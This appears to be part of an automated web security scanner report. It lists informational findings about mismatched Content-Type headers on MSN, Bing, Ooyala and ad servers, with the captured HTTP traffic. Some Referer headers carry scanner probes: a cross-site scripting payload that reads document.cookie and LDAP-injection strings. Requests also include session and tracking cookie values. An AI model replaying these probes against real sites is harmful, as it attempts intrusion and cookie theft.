{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.60. http://player.ooyala.com/info/primary/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://player.ooyala.com
Path:	/info/primary/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.61. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.62. http://sas.ooyala.com/authorized previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sas.ooyala.com
Path:	/authorized

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /authorized?embed%5Fcode%5Flist=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj%7CAxcnV3MTqRN%5FWSX8mNlR594n6311xhlc&parent%5Fauthorized=true&domain=technolog%2Emsnbc%2Emsn%2Ecom&signature=ZTCSAPMwQev6HB4Lp8uFEpo8cfcNcRTJRjvlxhICIGE&is%5Fjson=0&timestamp=1296391795389 HTTP/1.1
Host: sas.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:49:00 GMT
Status: 200 OK
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 436

wOl6RbSYry/+ZTKTqQemYLQMwnITDPaxZJbGIVUA5OmBLpO+qQkYVRFzwn35
tRdIQby+8GgI1s7e4oA5fM7ah/2+1Zq7tk6qAp6LFCDjASzcpRZv8fBZQs1m
nbmGGjWEib4TrcLUoL7rAe1ASycmWecK3N/pXlKZ+l6FR+P3Y344BEePXqDJ
bb1zmlzmVZmyEma1Q
...[SNIP]...

34.63. http://sas.ooyala.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sas.ooyala.com
Path:	/crossdomain.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

34.64. http://services.money.redacted/QuoteService/dynamic previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://services.money.msn.com
Path:	/QuoteService/dynamic

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /QuoteService/dynamic HTTP/1.1
Host: services.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:50:54 GMT
Connection: close
Content-Length: 27

Service manifest to come...

34.65. http://services.money.redacted/quoteservice/streaming previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://services.money.msn.com
Path:	/quoteservice/streaming

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /quoteservice/streaming HTTP/1.1
Host: services.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

34.66. http://static.pulse360.com/blob/3a/2bd5ab3_7821_mimg.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://static.pulse360.com
Path:	/blob/3a/2bd5ab3_7821_mimg.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /blob/3a/2bd5ab3_7821_mimg.jpg HTTP/1.1
Host: static.pulse360.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc_ms_1.3=EA

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:40 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:00:00 GMT
ETag: "1aeb0-100f-5f4d4000"
Accept-Ranges: bytes
Content-Length: 4111
Connection: close
Content-Type: image/jpeg

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

34.67. http://syndication.jobthread.com/jt/syndication/page.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://syndication.jobthread.com
Path:	/jt/syndication/page.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.68. http://technolog.msnbc.redacted/_vine/printer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://technolog.msnbc.redacted
Path:	/_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=technolog&path=/_news/2011/01/28/*)(sn=*/ HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:19:41 GMT
Connection: close
Content-Length: 485

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.69. http://thelastword.msnbc.redacted/_vine/printer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://thelastword.msnbc.redacted
Path:	/_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=thelastword&path=/ HTTP/1.1
Host: thelastword.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; SSLB=0; jt_time=1296391736965

Response

34.70. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

34.71. http://vms.redacted/vms.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://vms.redacted
Path:	/vms.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /vms.aspx HTTP/1.1
Host: vms.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://webmail.aol.com
Path:	/$\|http:/travel.aol.com/$\|http:/netscape.aol.com/$\|http:/music.aol.com/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:51:55 GMT
Content-Length: 11

Bad Request

34.73. http://wrapper.g.redacted/GRedirect.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wrapper.g.redacted
Path:	/GRedirect.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /GRedirect.aspx HTTP/1.1
Host: wrapper.g.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

34.74. http://www.bing.com/events/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/events/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

34.75. http://www.bing.com/maps/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/maps/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:56 GMT
Connection: close
Set-Cookie: _SS=SID=C6D59027EA0747AB8DD2C9066F834F1B; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:56 GMT; domain=.bing.com; path=/

Ref A: F5B4F6E4E5B9412689B572FF62C306E9 Ref B: 56A5449BCB4454A3591CFD44812E8727 Ref C: Sat Jan 29 15:52:56 2011
PST

34.76. http://www.bing.com/maps/default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/maps/default.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:58 GMT
Connection: close
Set-Cookie: _SS=SID=2C96094603F74D94934001A5533E04DA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:58 GMT; domain=.bing.com; path=/

Ref A: A60093E4C7AA47038798A4654D9A4C07 Ref B: 1BCEDC468447A8228BDF0ADDC45772C1 Ref C: Sat Jan 29 15:52:58 2011
PST

34.77. http://www.bing.com/maps/explore/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/maps/explore/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:58 GMT
Connection: close
Set-Cookie: _SS=SID=B8470F41D9A94D29A3E747A4610A6FCB; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:58 GMT; domain=.bing.com; path=/

Ref A: 1069C18BD6E5459B9C3DD46EB676C09C Ref B: D8EF537DEC3F612A7C2A5DB9A8BAAE1D Ref C: Sat Jan 29 15:52:58 2011
PST

34.78. http://www.bing.com/msnhomepagehistory.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/msnhomepagehistory.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: 91E11ED41EDC42D491A070AAB3F6B959 Ref B: 2975312DDC5A4D916D738818AD098869 Ref C: Sat Jan 29 15:53:31 2011
PST

34.79. http://www.bing.com/news/results.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/news/results.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:52 GMT
Connection: close
Set-Cookie: _SS=SID=5E1F9115C1EA4B9B995968DE47603F02; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:52 GMT; domain=.bing.com; path=/

Ref A: 660C8C25C216453B845C4BF350A8E898 Ref B: A6FAA5BB3557F1148A987FBDD435E11F Ref C: Sat Jan 29 15:52:52 2011
PST

34.80. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:54 GMT
Connection: close
Set-Cookie: _SS=SID=A9B88E62B70E4B34BE2F811642FCBC1F; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:54 GMT; domain=.bing.com; path=/

Ref A: 439D7953469D4565AE4494844EEDD5B4 Ref B: CA8F3CCB211A2CADFC52E8BC28773568 Ref C: Sat Jan 29 15:52:54 2011
PST

34.81. http://www.bing.com/sck previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/sck

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: D0950E1EACE249D2BE0BE1B31B83ECCD Ref B: B9B3F609E20511FB646C8CF91E038C47 Ref C: Sat Jan 29 15:53:31 2011
PST

34.82. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:27 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/

Ref A: 6A237C8B92934F8E8A82206F4C282E05 Ref B: E54BF75E2FC67B06BF4FA201E1C9AABE Ref C: Sat Jan 29 15:53:27 2011
PST

34.83. http://www.bing.com/shopping previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:25 GMT
Connection: close
Set-Cookie: _SS=SID=4B63AA5A07D74FCBA119E8B63BD0D67F; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:25 GMT; domain=.bing.com; path=/

Ref A: D96CB16301EF44AE8893EC77EC615AEC Ref B: 809510D4F48004696FBE33ED26C8864E Ref C: Sat Jan 29 15:53:25 2011
PST

34.84. http://www.bing.com/shopping/bird-feeders/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/bird-feeders/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shopping/bird-feeders/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:21 GMT
Connection: close
Set-Cookie: _SS=SID=5252C1118A604E168A01D3A173CAD597; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:21 GMT; domain=.bing.com; path=/

Ref A: FC45AF618CEF48F1A3B688EF6D32EABD Ref B: BB5D84B42300459880C423CCDFE297F6 Ref C: Sat Jan 29 15:53:21 2011
PST

34.85. http://www.bing.com/shopping/content/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/content/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:23 GMT
Connection: close
Set-Cookie: _SS=SID=9083CF4DD4F04399A827441A6B678897; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:23 GMT; domain=.bing.com; path=/

Ref A: 61A90BB5808940829EE5AE85BBD649E1 Ref B: 5C9A9170F8B66396B67EE3EF37C72E23 Ref C: Sat Jan 29 15:53:23 2011
PST

34.86. http://www.bing.com/shopping/makeup/c/4259 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/makeup/c/4259

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:22 GMT
Connection: close
Set-Cookie: _SS=SID=D3D7A96AE7D24FDCBD5B127206CA708D; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:22 GMT; domain=.bing.com; path=/

Ref A: 773FB6CC1D0E467499310BD5490337F1 Ref B: DA1B0E5B161F7FB8939378ECE551EB11 Ref C: Sat Jan 29 15:53:22 2011
PST

34.87. http://www.bing.com/shopping/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:24 GMT
Connection: close
Set-Cookie: _SS=SID=6F54DFCFF4A344C6980F3DE7B3D74B25; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:24 GMT; domain=.bing.com; path=/

Ref A: 81C046FB99FB4BFBA5EA2F0305FD6204 Ref B: 4380637013C20C53509510739529E079 Ref C: Sat Jan 29 15:53:24 2011
PST

34.88. http://www.bing.com/shopping/swimwear/c/4503 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/swimwear/c/4503

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:20 GMT
Connection: close
